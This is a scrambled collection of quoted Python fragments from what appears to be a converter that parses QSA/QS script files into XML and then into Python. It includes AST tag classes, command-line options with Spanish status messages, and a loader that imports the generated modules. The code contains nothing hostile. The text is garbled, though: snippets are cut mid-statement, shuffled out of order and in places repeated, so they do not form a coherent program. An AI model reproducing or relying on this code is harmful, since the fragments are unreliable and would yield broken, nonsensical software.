"'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags",
"return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k,",
"help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from",
"x in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x +",
"= [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\",",
"return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn,",
"if fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\",",
"vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element',",
"etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\",",
"if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return self class",
"New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags =",
"== \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if",
"and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn,",
"= None try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U',",
"def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags =",
"adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod",
"callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value):",
"['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def",
"vtype = \"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if vtype ==",
"InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list']",
"= open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No",
"\"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"]",
"= [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0:",
"= \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype =",
"print(\"Done.\") elif options.exec_python: # import qsatype for filename in args: realpath = os.path.realpath(filename)",
"parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return",
"def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return",
"tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname",
"= [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return",
"if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename)))",
"= flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir %-35s \\n\"",
"if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class",
"= imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError:",
"\"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags",
"v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source",
"Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn,",
"tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"]",
"sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%) \" % (bname, 100.0",
"= ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags",
"help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\")",
"OptionParser import os import os.path import sys import imp import traceback from lxml",
"= [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class",
"except Exception as e: print(\"Error: No se pudo abrir fichero %-35s \\n\" %",
"options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error al",
"parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1",
"__init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems =",
"self.astname = \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy()",
"listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if",
"\".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python",
"repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def",
"execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error",
"# import qsatype for filename in args: realpath = os.path.realpath(filename) path, name =",
"self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags):",
"str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags = [\"member_var\", \"member_call\"]",
"% tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global",
"class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags",
"> 0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if",
"if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn",
"adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def",
"options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test PY file load .",
"= filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__",
"class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags",
". . . . (%.1f%%) \" % (bname, 100.0 * (nf + 1.0)",
"action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of",
"in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata): global",
"nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream",
"create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls",
"dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to",
"None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\"",
"os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs =",
"PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp,",
"vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype",
"= [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = [\"instruction\"]",
"self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path])",
"ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags",
"def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status",
"print(\"Fichero no existe: %s\" % name) continue mod = Module(name, path) if not",
"def polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return self class DictObject(ListObject):",
"= [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class",
"else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\":",
"\"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags =",
"= os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname =",
"os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod = Module(name, path) if",
"if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem)",
"For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags =",
"OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags",
"subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype",
"= [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"]",
"data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values)",
"child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del",
"default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute",
"= False name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags =",
"xmlelem = create_xml(tagname) i = 0 for k, v in treedata['content']: if type(v)",
"True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags",
"= value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\" value =",
"return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def add_other(self, argn, vtype,",
"argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) ==",
"return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return",
"\".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr",
"'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp",
"(options, args) = parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:])",
"cls.can_process_tag(tagname): classobj = cls break if classobj is None: return None return classobj(tagname)",
"None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i =",
"se quiere guardar resultado, no hace falta calcular mas continue tree_data = None",
"Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other",
"callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class",
"subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self,",
"action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try",
"== \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value",
"ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other",
"\"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def",
"[\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname))",
"the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self,",
"status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\",",
"= \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False",
"return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist):",
"= io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\") except Exception:",
"child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return",
"treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\":",
"% bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s \\n\" %",
"existe: %s\" % name) continue mod = Module(name, path) if not mod.loadModule(): print(\"Error",
"= False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if",
"[\"constant\"] def add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype",
"def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags",
"imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero %r no encontrado\"",
"(bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent",
"fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname",
"@classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj = None",
"print(\"Pass 2 - Pythonize and write PY file . . .\") try: execute(options,",
"= [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class",
"classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k, v",
"tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other =",
"True if options.verbose: print(\"Pass 1 - Parse and write XML file . .",
"if options.verbose: print(\"Pass 2 - Pythonize and write PY file . . .\")",
"Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags =",
"self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description)",
"/ nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent =",
"name, path): self.name = name self.path = path def loadModule(self): fp = None",
"CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags =",
"= ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path,",
"file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\",",
"print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml:",
"= name self.path = path def loadModule(self): fp = None try: description =",
"None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self):",
"\".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename",
"return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types",
"callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod",
"False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other = False class",
"class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags",
"as e: print(traceback.format_exc()) result = False if fp: fp.close() return result def parseArgs(argv):",
"= imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero %r no",
"\"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags",
"False name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags = ['empty']",
"continue if not options.toxml: # Si no se quiere guardar resultado, no hace",
"InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other",
"def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else:",
"bname + \".py\") else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\")",
"> 2: print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if",
"for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python =",
"OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this",
"of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\",",
"\"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags",
"\"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"]",
"def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class Arguments(ListObject):",
"k, v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata):",
"if tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if",
"value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\" if",
"treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k",
"debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other =",
"@classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in",
"builtins import str from builtins import object from optparse import OptionParser import os",
"return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType]",
"ast is None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue if",
"and write PY file . . .\") try: execute(options, [arg + \".xml\" for",
"if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def",
"if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs =",
"+ \".py\") else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if",
"path): self.name = name self.path = path def loadModule(self): fp = None try:",
"if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try:",
"self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" +",
"stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\") except",
"0 and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn =",
"+ \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error al ejecutar Python:\")",
"3 - Test PY file load . . .\") options.topython = False try:",
"can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj = None for cls",
"os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename in enumerate(args):",
"self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = [] if",
"argn, vtype + \":\" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other:",
"tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"]",
"default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse",
"omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname):",
"tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"]",
"tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn =",
"FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags =",
"PY file load . . .\") options.topython = False try: execute( options, [(arg",
"help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from",
"class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags =",
"default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file",
"xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't",
"module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None,",
"adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags =",
"self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" %",
"OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one at the end. class",
"Exception as e: print(\"Error: No se pudo abrir fichero %-35s \\n\" % (repr(filename)),",
"% (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\"",
"fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return",
"xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v)",
"self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags =",
"options.topython = True if options.verbose: print(\"Pass 2 - Pythonize and write PY file",
"False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True",
"args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose:",
"tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"]",
"file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate",
"Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class",
"adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False",
"options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname = filename + \".xml\"",
"= [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class",
"in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero",
"+ \".xml\")] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename)",
". (%.1f%%) \" % (bname, 100.0 * (nf + 1.0) / nfs)) if",
"def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj = None for",
"if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod = Module(name,",
"Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn,",
"XML file . . .\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc())",
"is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj def get(self, listobj,",
"\\r\" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush()",
"quiere guardar resultado, no hace falta calcular mas continue tree_data = None try:",
"> os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename in enumerate(args): bname",
"tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem):",
"tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname",
"messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\",",
"NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn",
"args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\",",
"self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\",",
"se pudo parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast",
"tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def",
"tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) ==",
"this one at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False",
"treedata): xmlelem = create_xml(tagname) i = 0 for k, v in treedata['content']: if",
"\"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name,",
"one at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod",
"UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name = name self.path",
"value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype)",
"self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname",
"action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write",
"options.verbose: print(\"Pass 1 - Parse and write XML file . . .\") try:",
"= False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"]",
"return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml",
"= [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] #",
"if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname = filename +",
"[\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags =",
"result = True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result =",
"pudo parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast is",
"argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn",
"class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags",
"[\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn",
"options.verbose: print(\"Pass 2 - Pythonize and write PY file . . .\") try:",
"parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print(\"Pass 2 -",
". (%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0) / nfs)) if",
"falta calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except",
"['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone",
